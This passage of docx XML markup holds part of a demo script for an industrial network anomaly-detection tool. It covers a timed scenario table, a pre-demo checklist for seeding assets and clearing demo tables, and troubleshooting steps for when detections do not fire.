            <w:tcW w:type="dxa" w:w="3744"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Upload scenario 03 pcap (coil spoof)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4896"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Discuss why no anomaly fires. Show DPI events as raw evidence.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>T+18:00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Upload scenario 11 pcap (HTTP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4896"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Show amber edge from observed connections; explain the gap.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>T+21:00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Acknowledge + resolve flow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4896"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Workflow: Acknowledge → assign → Resolve with notes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>T+24:00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Open the gap-analysis roadmap section</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4896"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Use this document as the closing slide.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="047857"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>PRE-DEMO CHECKLIST</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Backend running, frontend running, login as a user with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ANALYST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ADMIN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> role.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Asset inventory pre-seeded with the IPs referenced in scenarios (script: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>seed_demo_assets.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">All 12 pcaps generated and renamed </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>01_modbus_scan.pcap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> … </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>12_slow_drift.pcap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Database wiped (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>DELETE FROM anomaly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>DELETE FROM dpi_event</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>) so the 'empty state' is real.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Browser zoom 110%, dark mode off, browser tabs closed except Dashboard, Anomalies, Topology.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="B45309"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>RECOVERY IF A SCENARIO DOES NOT FIRE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Most common failure: asset Purdue levels not seeded — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>dpi.unauthorized_write</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> short-circuits silently. Quick check: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>GET /api/assets?ip=10.20.0.50</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> → confirm </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>purdueLevel=LEVEL_3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Second most common: pcap upload returns 200 but no DpiEvent rows → confirm protocol port (502/102/2404) is parseable. Backend log will show </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>dpi.engine: 0 events</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> if dissection failed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">If stuck, fall back to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Show demo scenario</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> toggle on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/topology</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — this loads the canned Industroyer-style storyline so the visual story still works.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